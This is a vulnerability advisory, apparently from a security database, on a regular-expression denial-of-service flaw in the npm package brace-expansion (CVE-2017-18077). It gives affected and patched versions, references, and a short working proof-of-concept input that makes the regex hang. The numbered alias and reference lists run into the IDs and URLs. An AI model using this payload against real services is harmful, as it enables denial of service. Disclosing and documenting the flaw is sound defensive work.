Fluid Attacks Database

Description

ReDoS in brace-expansion Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.

Proof of Concept

var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');

Recommendation

Update to version 1.1.7 or later.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem	Package	Affected version	Patched versions
npm	brace-expansion	>=0 <1.1.7	1.1.7
debian 13	node-brace-expansion	>=0 <1.1.8-1	1.1.8-1
debian 14	node-brace-expansion	>=0 <1.1.8-1	1.1.8-1
debian 11	node-brace-expansion	>=0 <1.1.8-1	1.1.8-1
debian 12	node-brace-expansion	>=0 <1.1.8-1	1.1.8-1

Aliases

1. CVE-2017-180772. NVD-2017-180773. OSV-2017-180774. OSV-DEBIAN-2017-180775. GHSA-832h-xg76-4gv66. GCVE-2017-180777. SECURITY-TRACKER-CVE-2017-18077

References

1. https://github.com/juliangruber/brace-expansion/issues/332. https://github.com/juliangruber/brace-expansion/pull/353. https://github.com/juliangruber/brace-expansion/pull/35/commits/b13381281cead487cbdbfd6a69fb097ea5e456c34. https://bugs.debian.org/8627125. https://www.npmjs.com/advisories/338